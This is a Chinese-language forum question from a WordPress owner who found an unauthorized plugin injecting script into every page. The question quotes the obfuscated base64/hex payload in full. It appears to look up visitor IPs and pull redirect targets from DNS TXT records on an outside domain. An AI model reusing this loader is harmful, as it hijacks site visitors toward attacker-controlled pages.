我有一个 WordPress 网站,只有一个管理员帐户。
在某个时候,我发现了一个我没有安装的插件。 该插件称为“WPCode Lite”。 有了它,JS代码就被添加到了网站的所有页面:
<script>document.write(atob("PHNjcmlwdD52YXIgXzB4NWRiYT1bIlx4MkUiLCJceDJEIiwiXHg3Mlx4NjVceDcwXHg2Q1x4NjFceDYzXHg2NVx4NDFceDZDXHg2QyIsIlx4NjlceDcwIiwiXHgzQSIsIlx4NjhceDZGXHg3M1x4NzRceDZFXHg2MVx4NkRceDY1IiwiXHg2Q1x4NkZceDYzXHg2MVx4NzRceDY5XHg2Rlx4NkUiLCIiLCJceDc1XHg2RVx4NkJceDJFXHg2M1x4NkZceDZEIiwiXHg0MVx4NkVceDczXHg3N1x4NjVceDcyIiwiXHg3NFx4NzlceDcwXHg2NSIsIlx4NjRceDYxXHg3NFx4NjEiLCJceDY2XHg2Rlx4NzJceDQ1XHg2MVx4NjNceDY4IiwiXHg2Q1x4NjVceDZFXHg2N1x4NzRceDY4IiwiXHg3Mlx4NjVceDcwXHg2Q1x4NjFceDYzXHg2NSIsIlx4NzRceDY4XHg2NVx4NkUiLCJceDZBXHg3M1x4NkZceDZFIiwiXHg2OFx4NzRceDc0XHg3MFx4NzNceDNBXHgyRlx4MkZceDY0XHg2RVx4NzNceDJFXHg2N1x4NkZceDZGXHg2N1x4NkNceDY1XHgyRlx4NzJceDY1XHg3M1x4NkZceDZDXHg3Nlx4NjVceDNGXHg2RVx4NjFceDZEXHg2NVx4M0QiLCJceDcyXHg2MVx4NkVceDY0XHg2Rlx4NkQiLCJceDY2XHg2Q1x4NkZceDZGXHg3MiIsIlx4MkVceDc0XHg3Mlx4NjFceDYzXHg2Qlx4NjVceDcyXHgyRFx4NjNceDZDXHg2Rlx4NzVceDY0XHgyRVx4NjNceDZGXHg2RFx4MjZceDc0XHg3OVx4NzBceDY1XHgzRFx4NzRceDc4XHg3NCIsIlx4NjhceDc0XHg3NFx4NzBceDczXHgzQVx4MkZceDJGXHg2MVx4NzBceDY5XHgzNlx4MzRceDJFXHg2OVx4NzBceDY5XHg2Nlx4NzlceDJFXHg2Rlx4NzJceDY3XHgzRlx4NjZceDZGXHg3Mlx4NkRceDYxXHg3NFx4M0RceDZBXHg3M1x4NkZceDZFIl07KGZ1bmN0aW9uKF8weGQ3OGF4MSl7ZmV0Y2goXzB4NWRiYVsyMV0pW18weDVkYmFbMTVdXSgoXzB4ZDc4YXg3KT0+e3JldHVybiBfMHhkNzhheDdbXzB4NWRiYVsxNl1dKCl9KVtfMHg1ZGJhWzE1XV0oKF8weGQ3OGF4Mik9PntfMHhkNzhheDI9IF8weGQ3OGF4MltfMHg1ZGJhWzNdXVtfMHg1ZGJhWzJdXShfMHg1ZGJhWzBdLF8weDVkYmFbMV0pO18weGQ3OGF4Mj0gXzB4ZDc4YXgyW18weDVkYmFbMl1dKF8weDVkYmFbNF0sXzB4NWRiYVsxXSk7bGV0IF8weGQ3OGF4Mz13aW5kb3dbXzB4NWRiYVs2XV1bXzB4NWRiYVs1XV07aWYoXzB4ZDc4YXgzPT0gXzB4NWRiYVs3XSl7XzB4ZDc4YXgzPSBfMHg1ZGJhWzhdfTtmZXRjaChfMHg1ZGJhWzE3XSsgXzB4ZDc4YXgzKyBfMHg1ZGJhWzBdKyBfMHhkNzhheDIrIF8weDVkYmFbMF0rIE1hdGhbXzB4NWRiYVsxOV1dKE1hdGhbXzB4NWRiYVsxOF1dKCkqIDEwMjQqIDEwMjQqIDEwKSsgXzB4NWRiYVsyMF0pW18weDVkYmFbMTVdXSgoXzB4ZDc4YXg3KT0+e3JldHVybiBfMHhkNzhheDdbXzB4NWRiYVsxNl1dKCl9KVtfMHg1ZGJhWzE1XV0oKF8weGQ3OGF4NCk9PntpZihfMHhkNzhheDRbXzB4NWRiYVs5XV09PSBudWxsKXtyZXR1cm59O3ZhciBfMHhkNzhheDU9XzB4NWRiYVs3XTtfMHhkNzhheDRbXzB4NWRiYVs5XV1bXzB4NWRiYVsxMl1dKChfMHhkNzhheDYpPT57aWYoXzB4ZDc4YXg2W18weDVkYmFbMTBdXT09IDE2KXtfMHhkNzhheDUrPSBfMHhkNzhheDZbXzB4NWRiYVsxMV1dfX0pO18weGQ3OGF4NT0gYXRvYihfMHhkNzhheDUpO2lmKCFfMHhkNzhheDVbXzB4NWRiYVsxM11dKXtyZXR1cm59O3dpbmRvd1tfMHg1ZGJhWzZdXVtfMHg1ZGJhWzE0XV0oXzB4ZDc4YXg1KX0pfSl9KSgpPC9zY3JpcHQ+"));</script>
这段代码在网站上挂了大约一周,直到我注意到它。
黑客很可能从管理员帐户中获取了密码。 我将密码更改为更复杂的密码。
问题: 这段代码有什么作用? 会有什么后果?
document.write 用给定的输入替换 html 文档。
atob 函数解码 Base64 字符串。
从表面上看,这个长编码字符串包含由 atob 解密的实际代码。